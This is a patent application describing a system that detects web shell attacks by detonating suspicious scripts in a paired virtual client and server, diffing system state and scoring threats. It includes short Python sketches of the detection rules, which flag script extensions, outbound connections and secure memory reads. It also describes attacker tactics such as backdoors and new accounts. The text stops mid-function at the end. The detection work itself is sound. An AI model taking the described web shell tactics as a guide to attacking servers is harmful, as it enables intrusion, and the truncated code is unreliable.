System and method for detecting and protecting against cybersecurity attacks on servers

Abstract
An electronic device for detecting threats within a server including a processor, and a memory communicatively coupled to the processor. The memory includes an inspection logic to receive a suspicious object for threat evaluation, and an analyzer logic including at least a first analyzer. The first analyzer, when processed by the processor, generates a virtual environment including a virtual client and a virtual server in communication over a virtualized communication link. The memory also includes a detonator logic configured to trigger the suspicious object. The analyzer logic loads and initializes the suspicious object into the virtual environment and further generates a first score based upon the triggering by the detonator logic that is indicative of a threat posed by the suspicious object. The memory may also include a reporting logic that compares a threat score to at least one threshold and in response may generate at least one remedial action.
Description
FIELD

Embodiments of the disclosure relate to the field of cybersecurity. More specifically, certain embodiments of the disclosure relate to a system, apparatus and method for protecting servers against specific cybersecurity attacks.


BACKGROUND

Over the last decade, malicious software (malware) has become a pervasive problem for Internet users and system administrators of network servers. Such malware may come in the form of web shell attacks that can compromise servers on a network. Normally, a web shell attack is perpetrated through a script written in a popular scripting language supported by a server, such as a web server connected to a targeted enterprise network. More specifically, in many cases, scripts associated with a web shell attack (hereinafter, “web shell script”) are written in popular scripting languages known to be supported by a majority of web servers. Examples of popular scripting languages that tend to be utilized by web shell scripts may include, but are not limited or restricted to, PHP Hypertext Preprocessor (“PHP”), Python, Ruby, Perl, Active Server Pages (“ASP”), Java Server Pages (“JSP”) or Unix Shell Script.


In conducting a web shell attack, the web shell script may be loaded into the web server unnoticed, given that the web shell script could be uploaded in a dormant state as part of incoming Hypertext Transfer Protocol (HTTP) traffic. However, upon activation, the web shell script may enable a remote network device, operating as a client device, to gain access to stored content within the web server and/or gain administrative control of the web server. This may allow the web shell script to illicitly extract content stored within the web server or stored within another network device connected to a private network that is accessible via the web server.


In almost all cases, web shell attacks are challenging to detect and eliminate with conventional techniques because web shell scripts may remain dormant for a prolonged period of time and no additional software is necessary to commence a web shell attack. The web shell script may become active in response to a triggering event, such as commands received from a remote network device utilized by a cybersecurity threat actor conducting a web shell attack. Once the web shell script becomes active and communications are established with the remote network device, the cybersecurity threat actor may add a new login account, which allows the threat actor to access the compromised web server in the future without the need to upload any new file or script or conduct a secondary web shell attack.


Also, web shell attacks can be challenging to detect because they may involve the creation of a backdoor into the server, where the backdoor may allow the threat actor to remotely access and gain administrative control of the compromised server at any time in the future without further re-uploading or exchanging content via HTTP traffic. Such administrative control may allow the threat actor to gain escalated privileges, compromising the web server and its contents, and obfuscate his or her activity as he or she attempts to gain access to another server within a network by laterally infecting that server with the web shell script. Additionally, the threat actor may take steps to cover his or her tracks by closing an exploited vulnerability within the server to prevent others from compromising that server or to take steps to avoid detection.


In summary, various types of conventional cybersecurity systems have been deployed in an attempt to detect malware, including detecting malicious files or other network content uploaded into a server during a web shell attack. In some cases, these conventional cybersecurity systems evaluated suspicious objects (e.g., content including a script and/or executable code suspected of being malicious) and determined whether the object may be construed as a cybersecurity threat or not (i.e., benign).





BRIEF DESCRIPTION OF THE DRAWINGS

Embodiments of the invention are illustrated by way of example and not by way of limitation in the figures of the accompanying drawings, in which like references indicate similar elements and in which:



FIG. 1 depicts an exemplary system diagram of a communication network including one or more cybersecurity appliances and cybersecurity agents with virtualized analysis systems to detect a cybersecurity threat such as a web shell attack.



FIG. 2 depicts an exemplary block diagram of a network deploying a cybersecurity agent configured to detect a cybersecurity threat such as a web shell attack.



FIG. 3 depicts an exemplary block diagram of a network deploying a cybersecurity appliance configured to detect a cybersecurity threat such as a web shell attack.



FIG. 4 depicts an exemplary embodiment of a virtualized analysis system implemented with a single analyzer comprising a virtual client and virtual server in accordance with an embodiment of the invention.



FIG. 5 depicts an exemplary embodiment of a virtualized analysis system implemented with a first analyzer featuring a virtual server and a second analyzer featuring a virtual client in accordance with an embodiment of the invention.



FIG. 6 is an exemplary flowchart of the process of detecting cyberattacks on servers utilizing a virtualized analysis system of FIG. 4 or FIG. 5.





DETAILED DESCRIPTION

Various embodiments of the disclosure relate to a cybersecurity system and/or process configured with a virtualized analysis system to detect and protect against cybersecurity threats (e.g., a cyberattack) on servers, including web shell attacks. Unlike conventional cybersecurity schemes, the cybersecurity system provides a virtualized platform to conduct holistic analytics on a potential web shell script, including the bilateral communications between a virtual server and virtual client representative of a physical server and a client device. Herein, the virtualized analysis system includes a virtual server and a virtual client. A “virtual server” corresponds to a software representation of a physical server (e.g., processor, network interfaces, etc.) that may share physical hardware and software resources with other virtual servers. A “virtual client” corresponds to a software representation of physical resources associated with a client device (endpoint), such as a portable or stationary computer or smartphone for example, which is configured to communicate with the virtual server.


According to one embodiment of the disclosure, the cybersecurity system may include a first embodiment of the virtualized analysis system, which features a single (virtual) analyzer including both a virtual server and a virtual client. Monitoring logic is instantiated as part of the analyzer to monitor operability of the virtual server and the virtual client as well as the communications between the virtual server and the virtual client. For this analyzer, the virtual server may be provisioned in accordance with a software profile that supports processing of the suspicious object loaded into the virtual server, such as a web shell script for example, as well as communications with the virtual client. As an illustrative example, the virtual server may be provisioned to include one or more scripting engines (e.g., logic that alters script into executable code) that would effectuate processing of a web shell script. Similarly, the virtual client may be provisioned in accordance with a software profile (e.g., script applications, libraries, software development kits, etc.) to support communications with the virtual server.
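Profile-driven provisioning of this kind can be sketched as a lookup from the detected script type to the packages installed on the virtual server and virtual client. This is a minimal illustrative sketch, not the patented implementation; the table contents and the names `SOFTWARE_PROFILES` and `select_profile` are assumptions.

```python
# Hypothetical mapping from a detected script type to the software profile
# used to provision the virtual server and virtual client. The profile
# entries are illustrative placeholders, not actual package names.
SOFTWARE_PROFILES = {
    "php": {
        "server": ["php-scripting-engine", "web-server-stack"],
        "client": ["php-client-libs", "http-client-sdk"],
    },
    "jsp": {
        "server": ["jsp-servlet-container"],
        "client": ["java-http-client"],
    },
}

def select_profile(script_type: str) -> dict:
    """Return the server/client provisioning profile for a script type,
    falling back to a generic profile when the type is unrecognized."""
    generic = {"server": ["generic-web-server"],
               "client": ["generic-http-client"]}
    return SOFTWARE_PROFILES.get(script_type, generic)
```

A caller would detect the script type during inspection (e.g., from the object's extension) and hand the returned profile to whatever logic instantiates the virtual environment.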


More specifically, configured to detect web shell attacks or other types of cybersecurity threats, the cybersecurity system may be deployed as a cybersecurity agent or a cybersecurity appliance. According to one embodiment of the disclosure, the cybersecurity agent corresponds to software installed within a network device (e.g., server), operating in the foreground or background, that receives and analyzes objects to determine whether such objects are part of a cybersecurity threat (e.g., web shell attack). In particular, the cybersecurity agent may be configured to at least (i) receive, as input, an object (defined below) for analysis and meta-information associated with that object, and (ii) determine whether the object is “suspicious”. The term “suspicious” indicates that a corresponding object cannot be definitively determined to be benign or malicious.


For this embodiment of the disclosure, the cybersecurity agent may be configured to collect content and meta-information associated with the object and conduct a rule-based inspection to determine whether the received object is suspicious. As an illustrative example, logic within the cybersecurity agent may inspect, in accordance with one or more detection rules, content of the object and/or meta-information associated with the object to determine whether the object is a script or a particular script type. One of the detection rules may be directed to inspecting an extension associated with the object to determine whether the extension identifies the object as a known script. For instance, an object with a “.php” extension may be identified as a particular script, namely a PHP file to generate dynamic web pages with code that enables web pages to gather details entered by viewers as well as process and store that data for later retrieval (hereinafter, “PHP file”). As PHP files (and scripts in general) are widely used to initiate a web shell attack, the object would be deemed “suspicious” based on a single characteristic that the object is a script. Of course, various characteristics of the object, solely or in combination, may cause the object to be identified as “suspicious,” resulting in the object undergoing further analyses by an analyzer.
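The extension-based detection rule described above can be sketched as follows. This is a minimal sketch under stated assumptions: the extension set and the function name `is_suspicious` are illustrative, and a real agent would combine this rule with other characteristics before classifying an object.

```python
import os

# Extensions the disclosure associates with scripts used in web shell
# attacks (PHP, ASP, JSP, Python, Ruby, Perl, Unix shell). The set is an
# illustrative sketch of one detection rule, not an exhaustive rule base.
SCRIPT_EXTENSIONS = {".php": "PHP", ".asp": "ASP", ".jsp": "JSP",
                     ".py": "Python", ".rb": "Ruby", ".pl": "Perl",
                     ".sh": "Shell"}

def is_suspicious(filename: str) -> bool:
    """Single-characteristic rule: an object whose extension identifies it
    as a known script type is deemed suspicious and queued for further
    analysis by an analyzer."""
    _, ext = os.path.splitext(filename.lower())
    return ext in SCRIPT_EXTENSIONS
```

For example, `is_suspicious("upload.PHP")` would flag the object for deeper analysis, while an image upload would pass through this particular rule.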


Besides suspicious object detection, the cybersecurity agent may be further configured to (iii) provision an analyzer to process that suspicious object; (iv) load the suspicious object into the virtual server; (v) conduct analytics of each suspicious object within the analyzer; and (vi) report the results of the analytics. As described, these operations (iii)-(vi) associated with the virtualized analysis system may be conducted by the cybersecurity agent; however, as an alternative embodiment, some or all of these operations (iii)-(vi) may be conducted by logic that is different from the cybersecurity agent, but is operating in cooperation therewith. For instance, the cybersecurity agent may detect and supply suspicious objects to the virtualized analysis system, but the virtualized analysis system operates within another network device, within a public cloud network, or the like.


Continuing with the illustrative example described above, upon identifying the object is a PHP file and thereby “suspicious,” the cybersecurity agent (or other logic) may provision the virtual server of the virtualized analysis system with a PHP scripting engine to translate the contents of the PHP file into executable code. Similarly, the cybersecurity agent may provision the virtual client with PHP software (e.g., application, libraries, software development kits, or the like) to support communications with the virtual server.


According to one embodiment of the disclosure, after provisioning the virtual server and the virtual client, the suspicious object is loaded into the virtual server prior to detonation of the suspicious object or as part of the detonation technique. The detonation of the suspicious object may include processing of the suspicious object and orchestrating (organizing and/or sequencing) communications between the virtual server and the virtual client (e.g., sending commands from the virtual client, responding to messages caused by the object operating on the virtual server, etc.). These communications may cause the object to perform unexpected, abnormal or inconsistent events indicative that the object is associated with a cybersecurity threat such as a web shell attack (e.g., increased privileges request message, commands outside normal operations of the suspicious object, increased downloading, attempted network connections, attempted reads from a secure memory location, etc.).
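The orchestrated detonation described above can be sketched as driving a command sequence from the virtual client and collecting any anomalous events the monitoring logic observes on the virtual server. This is a hypothetical sketch: the event names, the `send_command` callable and the function `detonate` are assumptions for illustration, not the disclosed implementation.

```python
# Hypothetical event labels that monitoring logic might emit when the
# detonated object behaves abnormally (per the examples in the text).
SUSPICIOUS_EVENTS = {
    "privilege_escalation_request",
    "outbound_network_connection",
    "secure_memory_read",
}

def detonate(send_command, command_sequence):
    """Drive the virtual client through a sequence of commands toward the
    virtual server and return the monitored events that are indicative of
    a web shell attack."""
    observed = []
    for cmd in command_sequence:
        # send_command abstracts the virtualized communication link; it
        # returns the events raised while the virtual server handles cmd.
        events = send_command(cmd)
        observed.extend(e for e in events if e in SUSPICIOUS_EVENTS)
    return observed

# Usage with a stand-in for the virtualized link:
def fake_send(cmd):
    return ["privilege_escalation_request"] if cmd == "whoami" else []
```

Here `detonate(fake_send, ["ls", "whoami"])` would surface the privilege-escalation event, which downstream scoring logic could weigh toward a malicious verdict.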


Additionally, the virtualized analysis system may examine the end states of the virtual server and virtual client to determine what changes have occurred within the virtualized analysis system after detonation. New login accounts or passcodes, backdoors, or other suspicious activity can be more easily determined via comparison between content representing the starting state of the virtualized analysis system and content representing the current state of the virtualized analysis system. Finally, the virtualized analysis system may detect additional “dropped” objects that are introduced as a result of the detonation (processes created during processing), which may then also be analyzed by the virtualized analysis system for the presence of malware. These additional analytics may be supportive in determining whether a suspicious object is part of a web shell attack, where the collective analytics may generate an overall threat assessment score to determine whether the suspicious object is malware, and more specifically, a web shell script.
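The end-state comparison described above amounts to diffing a snapshot taken before detonation against one taken after. The sketch below illustrates this under the assumption that each state is captured as a flat dictionary; the function name `diff_state` and the snapshot keys are hypothetical.

```python
def diff_state(start_state: dict, end_state: dict) -> dict:
    """Compare snapshots of the virtualized analysis system taken before
    and after detonation. Entries that appear or change (e.g., new login
    accounts, dropped files, opened backdoors) surface as candidate
    evidence that the object is a web shell script."""
    added = {k: v for k, v in end_state.items() if k not in start_state}
    changed = {k: v for k, v in end_state.items()
               if k in start_state and start_state[k] != v}
    return {"added": added, "changed": changed}
```

For instance, a new account appearing in the post-detonation snapshot, or a dropped `.php` file, would show up in `added`/`changed` and could itself be routed back through the virtualized analysis system for evaluation.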


To provide a more robust cybersecurity system, a first threat assessment score generated by the virtualized analysis system may be considered with a second threat assessment score produced by conventional static analytics of the same object. The second threat assessment score is determined from an inspection of the characteristics of the object, without its execution. These characteristics may be used to determine whether the object under analysis is associated with a cybersecurity threat such as a web shell attack. The static analytics also may be relied upon to assist in selecting a software profile for provisioning the virtual server and virtual client as described above, including selection of its particular operating system (OS) and application configuration, scripting engines, or the like. One example of static analytics is described in U.S. Pat. No. 10,033,747, entitled “System and Method For Detecting Interpreter-Based Exploit Attacks,” issued on Jul. 24, 2017, the disclosure of which is hereby incorporated by reference in its entirety.


In a number of embodiments, correlation logic implemented within the cybersecurity system can analyze these threat assessment scores to generate the “overall” threat assessment score, which can be evaluated against a set of rules and/or thresholds (e.g., prescribed thresholds or dynamic thresholds that may vary depending on a variety of metrics such as the object type or the software profile used in provisioning the virtualized analysis system). These rules and thresholds may be changed or updated periodically or aperiodically in response to, for example, various new threats or current conditions of the cybersecurity system. When a suspicious object is determined to be malicious, the cybersecurity system can take remedial action including, but not limited or restricted to, issuing an alert, deleting, or otherwise quarantining the malicious object.
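The correlation step can be sketched as a weighted combination of the dynamic and static threat assessment scores, evaluated against a threshold to select a remedial action. The weighting, threshold value, and function names below are illustrative assumptions, not values from the disclosure.

```python
def overall_score(dynamic_score: float, static_score: float,
                  weight: float = 0.6) -> float:
    """Correlate the virtualized (dynamic) and static threat assessment
    scores into an overall score. The 60/40 weighting is an illustrative
    assumption; a deployed system might tune it per object type."""
    return weight * dynamic_score + (1.0 - weight) * static_score

def remedial_action(score: float, threshold: float = 0.7) -> str:
    """Map the overall threat assessment score onto a remedial action once
    it is evaluated against the maliciousness threshold."""
    return "quarantine_and_alert" if score >= threshold else "monitor"
```

In this sketch, a high dynamic score from detonation can push an otherwise borderline object over the threshold, triggering quarantine and an alert; thresholds could be updated as the rule set changes.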


In lieu of the cybersecurity system being configured to include a virtualized analysis system having a single analyzer as described above, the cybersecurity system may include a second embodiment of the virtualized analysis system, which features multiple (two or more) analyzers. For this embodiment of the virtualized analysis system, a first analyzer is provisioned to operate as a virtual server while a second analyzer is provisioned to operate as a virtual client. The provisioning of the first analyzer is conducted separately from the provisioning of the second analyzer. However, the overall operations of the virtualized analysis system would be consistent with a virtualized analysis system having the single analyzer.


According to another embodiment of the disclosure, the cybersecurity system may operate as a “cybersecurity appliance,” namely a network device configured to conduct analytics on one or more objects (defined below) to determine whether any of the objects constitute a cybersecurity threat such as being part of a web shell attack. Similar to the operations of the cybersecurity agent described above, the cybersecurity appliance may be configured to receive, as input, objects for analysis and meta-information associated with those objects, and for each object, (i) determine whether the object is suspicious, (ii) provision the virtual machine(s) to process that suspicious object, (iii) load the suspicious object into a virtual server provisioned within the virtual machine(s), (iv) conduct analytics of the suspicious object within the analyzer, and/or (v) report the results of the analytics.


It is understood that the cybersecurity system and process described herein provide for a more efficient and more successful method of detecting cybersecurity threats posed to any network device such as a server, including web shell attacks, through the use of a virtual client and virtual server. The monitoring of the virtual communication between the virtual client and virtual server, along with examining any subsequently created objects and end-states, can provide a more accurate threat assessment of suspicious objects, thereby facilitating the practical application of providing more safety, uptime, and control to all types of networks including enterprise networks.


I. Terminology

In the following description, certain terminology is used to describe features of the invention. For example, in certain situations, the terms “logic” and “engine” are representative of hardware, firmware or software that is configured to perform one or more functions. As hardware, logic (or engine) may include circuitry such as one or more processors (e.g., a microprocessor, one or more processor cores, a programmable gate array, a microcontroller, an application specific integrated circuit, etc.), wireless receiver, transmitter and/or transceiver circuitry, semiconductor memory, combinatorial logic, or other types of electronic components.


As software, logic (or engine) may be in the form of one or more software modules, such as executable code in the form of an executable application, a script, an application programming interface (API), a subroutine, a function, a procedure, an applet, a servlet, a routine, source code, object code, a shared library/dynamic load library, or one or more instructions. These software modules may be stored in any type of a suitable non-transitory storage medium, or transitory storage medium (e.g., electrical, optical, acoustical or other form of propagated signals such as carrier waves, infrared signals, or digital signals). Examples of non-transitory storage medium may include, but are not limited or restricted to, a programmable circuit; a semiconductor memory; non-persistent storage such as volatile memory (e.g., any type of random access memory “RAM”); persistent storage such as non-volatile memory (e.g., read-only memory “ROM”, power-backed RAM, flash memory, phase-change memory, etc.), a solid-state drive, hard disk drive, an optical disc drive, or a portable memory device. As firmware, the logic (or engine) is stored in persistent storage.


The term “malware” is directed to software (e.g., script such as a web shell script, process, application, routine, or series of instructions) that produces an undesirable behavior upon execution, where the behavior is deemed to be “undesirable” based on customer-specific rules, manufacturer-based rules, or any other type of rules formulated by public opinion or a particular governmental or commercial entity. This undesired behavior may include a communication-based anomaly or an execution-based anomaly that (1) alters the functionality of an electronic device executing that application software in a malicious manner; (2) alters the functionality of an electronic device executing that application software without any malicious intent; and/or (3) provides an unwanted functionality which is generally acceptable in other contexts.


The term “object” generally refers to content in the form of an item of information having a logical structure or organization that enables it to be classified for purposes of analysis for malware or an address (pointer) to where such content is stored. One example of the object may include an email message or a portion of the email message. Another example of the object may include a storage file or a document such as a PHP, ASP or JSP file or other dynamic file, a word processing document such as Word® document, or other information that may be subjected to cybersecurity analysis. The object may also include an executable such as an application, program, code segment, a script, dynamic link library “dll,” URL link, or any other element having a format that can be directly executed or interpreted by logic within the electronic device.


The term “transmission medium” may constitute a physical or virtual communication link between two or more systems. For instance, the transmission medium may correspond to a physical (wired or wireless) communication link between two or more network devices (defined below). The physical communication link may include electrical wiring, optical fiber, cable, bus trace, or a wireless channel using infrared, radio frequency (RF), or any other wired/wireless signaling mechanism. Alternatively, the transmission medium may correspond to a virtual communication link that provides logical connectivity between different logic (e.g., software modules).


The term “network device” should be generally construed as an electronic device with data processing capability and/or a capability of connecting to any type of network, such as a public network (e.g., Internet), a private network (e.g., a wireless data telecommunication network, a local area network “LAN”, etc.), or a combination of networks. Examples of a network device may include, but are not limited or restricted to, the following: a server or other stand-alone electronic device, cybersecurity appliance, a mainframe, a firewall, a data transfer device (e.g., router, switch, modem, bridge, etc.), an info-entertainment device, a vehicle, a medical device, a client device (endpoint) such as a laptop, a smartphone, a tablet, a desktop computer, a netbook, gaming console or gaming accessory, or any general-purpose or special-purpose, user-controlled electronic device. In many embodiments, the term “network device” may be used synonymously with the term “electronic device.”


The term “message” generally refers to signaling (wired or wireless) as either information placed in a prescribed format and transmitted in accordance with a suitable delivery protocol or information made accessible through a logical data structure such as an API. Hence, each message may be in the form of one or more packets, frames, or any other series of bits having the prescribed, structured format.


Lastly, the terms “or” and “and/or” as used herein are to be interpreted as inclusive or meaning any one or any combination. Therefore, “A, B or C” or “A, B and/or C” mean “any of the following: A; B; C; A and B; A and C; B and C; A, B and C.” An exception to this definition will occur only when a combination of elements, functions, steps or acts are in some way inherently mutually exclusive.


As this invention is susceptible to embodiments of many different forms, it is intended that the present disclosure is to be considered as an example of the principles of the invention and not intended to limit the invention to the specific embodiments shown and described.


II. General Architecture

Referring to FIG. 1, an exemplary system diagram of a communication network 100 is shown. The communication network 100 includes a plurality of network devices 120, 130, 140, 150 in communication over a network 110. As shown, network devices 130 and 140 correspond to cybersecurity appliances while each network device 120, 150 includes a cybersecurity agent 125, 155, respectively. The cybersecurity agents 125, 155 are loaded and executed on the network devices 120 and 150 to analyze objects and detect cybersecurity threats (e.g., malicious web shell script). The network 110 may encompass any type of network including, but not limited to, a public network (Internet) or a private network (e.g., a local area network). The network devices 120, 130, 140, 150 are communicatively coupled together via the network 110, albeit the network device 120 is implemented within a (customer) network 122 and network device 150 is coupled to the network 110 via another intermediary network 160.


According to one embodiment of the disclosure, each cybersecurity appliance 130 or 140 may be implemented as or on a stand-alone network device that is implemented with logic to detect a cybersecurity threat (e.g., potential infection of network by malware through a web shell attack). More specifically, each cybersecurity appliance (e.g., cybersecurity appliance 130) may be configured to receive, as input, one or more objects (e.g., object 170) for analysis. The cybersecurity appliance 130 may inspect the content of the object 170 and/or meta-information 175 associated with that object 170 to determine whether that object 170 is suspicious. This inspection may be conducted by inspection logic (see FIG. 3) within the cybersecurity appliance 130, where the inspection logic generates a threat assessment score based on the level of compliance (or non-compliance) of the inspected information with rules formulated to identify characteristics associated with known malicious objects and/or known benign objects. When the threat assessment score exceeds a first threshold, the object 170 is deemed “suspicious,” prompting a more detailed analysis of the object 170 within a virtualized analysis system as described below.


Each cybersecurity agent 125 or 155 may be implemented as software installed on a respective network device 120 or 150, where the software conducts run-time threat detection on an object in an effort to determine whether the object is a cybersecurity threat (e.g., web shell attack). In particular, each cybersecurity agent (e.g., agent 125) may be configured, at least, to (i) receive, as input, an object 180 and/or meta-information 185 associated with that object 180 for analysis, and (ii) determine whether the object 180 is suspicious. Similar to the above-described operability of the cybersecurity appliance 130, the cybersecurity agent 125 may conduct a rule-based inspection of the content of the object 180 and/or meta-information 185 to determine whether that object 180 is suspicious. If so (e.g., the threat assessment score exceeds the first threshold), the object 180 is deemed “suspicious,” similarly causing a more detailed analysis of the object 180 within a virtualized analysis system described below.


As an illustrative example of the inspection process, a cybersecurity system 125/130 (e.g., the cybersecurity agent 125 or inspection logic within the cybersecurity appliance 130) may inspect, in accordance with one or more detection rules (not shown), content of the object 180/170 and/or meta-information 185/175 associated with the object 180/170 to determine whether the object 180/170 is a script or a particular script type. For example, one of the detection rules may conclude that the object 180/170 is deemed to be “suspicious” if the object's extension, being part of the meta-information 185/175, corresponds to a particular script (e.g., a “.php” extension identifying that the object is a PHP file widely used to conduct a web shell attack). Hence, upon inspection of the extension of the object 180/170 and uncovering a “.php” extension, the cybersecurity system 125/130 determines that the object 180/170 is “suspicious.” It is contemplated that the detection rules may be configured for use in identifying PHP files as described above, or even other script types (e.g., ASP or JSP files) included as part of the object 180/170.


Besides suspicious object detection, the cybersecurity agent 125 may be further configured to (iii) provision an analyzer to process that suspicious object 180; (iv) load the suspicious object 180 into the virtual server; (v) conduct analytics of at least the suspicious object 180 within an analyzer; and (vi) report the results of the analytics via the network 110. As described, these operations (iii)-(vi) may be conducted by the cybersecurity agent 125; however, as an alternative embodiment, some or all of these operations (iii)-(vi) may be conducted by logic that is different from the cybersecurity agent 125, but is operating in cooperation therewith. For instance, the cybersecurity agent 125 may perform real-time analysis of the content of the object 180 and/or its meta-information 185 to determine whether the object 180 is “suspicious;” however, the “behavioral” analytics of the object 180 may be conducted by one of the cybersecurity appliances 130 or 140, logic 195 within a public cloud network 190, or the like.


In a variety of embodiments, a customer network 145 may be in communication with an external cybersecurity appliance 140. These embodiments may be useful for situations where a customer network 145 is already established and cannot accommodate a direct integration with a cybersecurity appliance. In other embodiments, the cybersecurity appliance 140 may be a third party device licensed, leased, or otherwise provided to the customer network 145 for use. In still further embodiments, the cybersecurity appliance 140 may be positioned between the customer network 145 and the network 110, such that all incoming messages and network content traveling over the network 110 are inspected for cybersecurity threats before arriving within the customer network 145.


In numerous embodiments, the intermediary network 160 may be in communication with an external cybersecurity agent 155. In still additional embodiments, the intermediary network 160 may receive network content and pass along suspicious objects to the cybersecurity agent 155, which may perform analytics on the suspicious objects prior to saving or execution. In these cases, the intermediary network 160 may deploy servers or other network devices that feature logic (e.g., software, rules-based engine, etc.) that, under certain conditions, redirects network content to the cybersecurity agent 155. By way of example and not limitation, the intermediary network 160 may already have a cybersecurity system installed that functions but otherwise lacks the ability to successfully detect and/or eliminate web shell attacks. In these cases, the previously installed cybersecurity system of the intermediary network 160 may be communicatively coupled to the network device 150 and its cybersecurity agent 155 that can be tasked with supplementing the pre-installed cybersecurity system by evaluating scripts to detect a web shell attack. Such outsourcing of threat evaluation can be executed remotely and also be provided in a Software as a Service (“SaaS”) model.


In some embodiments, the transfer of suspicious objects may be done within a private enterprise network. As a result, the cybersecurity system may be configured to detect, monitor and analyze the transfer of suspicious objects between multiple network devices operating within a single customer network (east-west traffic). Likewise, the cybersecurity system may be configured to detect, monitor and analyze the transfer of suspicious objects residing in different network devices, such as where a first network device is deployed within a customer network and a second network device is deployed outside of the customer network (e.g., another local area network, a cloud network, etc.).


It would be understood by those skilled in the art that although certain embodiments are highlighted in discussion of FIG. 1, a wider variety of embodiments are possible and contemplated by this application. In fact, based on the desired application and layout, a mixture of customer networks and cybersecurity systems can be achieved in order to detect web shell attacks. Customer networks are described in more detail below.


Referring now to FIG. 2, an exemplary block diagram of the network 122 deploying the cybersecurity agent 125 installed within the network device 120 is shown. Herein, the network 122 features the network device 120 along with a plurality of network devices 2101-210N. As shown, the network devices 2101-210N (N≥1) are represented as servers; however, it is contemplated that these network devices may correspond to other types of electronic devices such as client devices. It should be understood that the number of servers within the network 122 may vary based on the type of network and application desired. Each of the servers 2101-210N may be in communication with each other as well as with other network devices on the network 122.


As shown, the network 122 is in communication with the network 110 to receive one or more objects and/or their corresponding meta-information (e.g., object 180 and/or meta-information 185) directed to the network device 120. As shown, the network device 120 includes the cybersecurity agent 125, namely software installed within the network device 120 and operating in the foreground or background to detect cybersecurity threats such as web shell attacks. Additionally, the network device 120 may receive one or more objects (e.g., object 200) from one of the servers 2101-210N along with its corresponding meta-information 205 for analysis. The cybersecurity agent 125 is configured to receive and analyze the incoming objects 180, 200 to determine whether such objects are part of a cybersecurity threat (e.g., web shell attack). In particular, for analysis of object 180 for example, the cybersecurity agent 125 may be configured to at least (i) receive the object 180 for analysis and its associated meta-information 185, and (ii) determine whether the object 180 is suspicious based on the content of the object 180 and/or the meta-information 185.


As described above, the cybersecurity agent 125 may be configured to collect content and meta-information 185 associated with the object 180 and inspect the collected information for particular characteristics (e.g., content that is highly susceptible to web shell attacks such as a script, specific data patterns or sequences, deviations in messaging practices (structure, format or ordering informalities, increased messaging attempts, etc.)) that, individually or collectively, suggest that the object 180 is "suspicious." Of course, it is contemplated that the "suspiciousness" determination may be made using only the content of the object 180, where the meta-information 185 is collected after the object 180 is deemed suspicious and is provided with the object 180 to a virtualized analysis system 225.


As shown in detail in FIGS. 4-5 (identified as virtualized analysis systems 400 and 500 therein), the virtualized analysis system 225 includes a virtual server (software representation of a physical server) communicatively coupled to a virtual client (software representation of physical resources associated with a client device). Herein, where the object 180 is deemed suspicious, the cybersecurity agent 125 may be further configured to provision the virtual server and virtual client within the virtualized analysis system 225 and load the suspicious object 180 into the virtualized analysis system 225.


The virtualized analysis system 225 detonates the suspicious object 180, and thereafter, monitors events that occur during the processing of the suspicious object 180. Herein, according to one embodiment of the disclosure, the detonation of the suspicious object 180 may include orchestrating communications between the virtual server and the virtual client (e.g., sending commands from the virtual client, responding to messages from the object, etc.), which may prompt the suspicious object 180 to perform unexpected, abnormal or inconsistent events indicative of a cybersecurity threat such as a web shell attack. Examples of these unexpected, abnormal or inconsistent events may include, but are not limited or restricted to an increased number of privilege request messages, receipt of commands outside normal operations of the suspicious object, increased attempts to download content from any of servers 2101-210N, attempted network connections, attempted reads from a secure memory location, or the like.


After detonation of the suspicious object 180, logic within the virtualized analysis system 225 monitors behaviors (events) occurring within the virtualized analysis system 225 (e.g., virtual server, virtual client, etc.) and conducts analytics on the monitored events. The analytics may involve analysis of events conducted by the virtual server and virtual client during processing of the suspicious object 180, especially an analysis of the events being communicated between the virtual server and the virtual client. After completion of the analytics, results may be reported to one or more administrators with suitable credentials to receive such results.


Additionally, the virtualized analysis system 225 may be configured to examine the end state of the virtualized analysis system, notably the virtual server and virtual client, to determine what changes have occurred within the virtualized analysis system 225 after detonation. Certain activities, such as the creation of new login accounts, changes to passcodes, backdoor creations, or other activities that attempt to alter access restrictions, can be more easily determined via comparison between the starting state of the virtualized analysis system 225 (virtual server, virtual client) versus its current state. Also, the virtualized analysis system 225 may detect additional "dropped" objects that are introduced as a result of the detonation (objects, such as processes or other scripts and/or files created during processing), which may then also be analyzed by the virtualized analysis system 225 for the presence of web shell script. These additional analytics may assist in the determination as to whether the suspicious object 180 constitutes a cybersecurity threat (e.g., part of a web shell attack). Each of these analytics (e.g., event analytics, state change analytics, and/or dropped object detection analytics) may generate a corresponding threat assessment score, and based on a collection of some or all of these analytics, the virtualized analysis system 225 may generate an overall threat assessment score to determine whether the suspicious object is malware, and more specifically, web shell script.
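The state-change analytics described above can be illustrated with a minimal sketch. The snapshot structure (sets of accounts and files per category) and the score weights are illustrative assumptions for exposition, not details taken from the disclosed system.

```python
def diff_states(start_state, end_state):
    """Return entries (e.g., accounts, files) that appeared after detonation."""
    changes = {}
    for category, before in start_state.items():
        added = end_state.get(category, set()) - before
        if added:
            changes[category] = added
    return changes

def score_state_changes(changes, weights):
    """Map each category of observed change to an assumed threat weight."""
    return sum(weights.get(cat, 0) * len(items) for cat, items in changes.items())

# Hypothetical starting and ending snapshots of a virtual server:
start = {"accounts": {"admin"}, "files": {"/var/www/index.php"}}
end = {"accounts": {"admin", "backdoor_user"},
       "files": {"/var/www/index.php", "/var/www/shell.php"}}

changes = diff_states(start, end)
weights = {"accounts": 40, "files": 25}   # illustrative per-category weights
score = score_state_changes(changes, weights)
```

A new login account and a dropped script file would each contribute to the state-change threat assessment score under this sketch.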


To provide a more robust cybersecurity system, the overall threat assessment score generated by the virtualized analysis system 225 may be combined with a threat assessment score generated by the cybersecurity agent 125 during inspection of characteristics of the object 180 and/or meta-information 185 during the determination as to whether the object 180 is “suspicious.”


In a number of embodiments, the cybersecurity agent 125 implemented within the network device 120 can utilize the above-described threat assessment scores to generate the “final” threat assessment score, which can be evaluated against a set of rules and/or thresholds (e.g., prescribed thresholds or dynamic thresholds that may vary depending on a variety of metrics such as the object type or the software profile used in provisioning the virtualized analysis system). These rules and thresholds may be changed or updated periodically or aperiodically in response to, for example, various new threats or current conditions of the cybersecurity system. When the suspicious object 180 is determined to be malicious, the cybersecurity agent 125 may cause the network device 120 to take remedial action including, but not limited or restricted to, issuing an alert, deleting, or otherwise quarantining the suspicious object 180.
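The combination of threat assessment scores and the threshold evaluation described above might be sketched as follows; the weighting split between the inspection-stage score and the virtualized-analysis score, the threshold value, and the action names are all assumptions for illustration.

```python
def final_threat_score(inspection_score, virtual_score,
                       w_inspect=0.3, w_virtual=0.7):
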